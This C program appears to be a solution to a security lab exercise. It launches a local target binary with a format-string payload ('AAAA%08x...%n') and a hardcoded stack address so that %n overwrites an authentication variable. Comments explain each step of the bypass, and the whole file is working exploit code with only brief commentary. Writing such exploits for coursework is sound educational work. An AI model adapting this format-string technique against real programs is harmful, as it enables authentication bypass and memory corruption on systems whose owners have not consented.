#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>



#define TARGET "/home/maluser/Q2/target-q2"

int main(void)
{
  char *args[4];
  char *env[2];

  args[0] = TARGET; 
  
  /* This gets passed in as username.
   * Use %08x to move printf's pointer to userid's location
   * on the stack. userid contains the address of auth and the 
   * %n will print the number of bytes written 
   * (4 - the four 'A's) to this address. In other words, the %n 
   * will cause auth to be overwritten with the value 4.
   */
  args[1] = "AAAA%08x%08x%08x%08x%08x%08x%08x%n"; 

  /* This gets passed in as userid.
   * Use the userid parameter to pass in the address of auth*/
  args[2] = "0xbffffe2c";
  args[3] = NULL;
  env[0] = "FOO=bar"; env[1] = NULL;

  if (0 > execve(TARGET, args, env))
    fprintf(stderr, "execve failed.\n");

  return 0;
}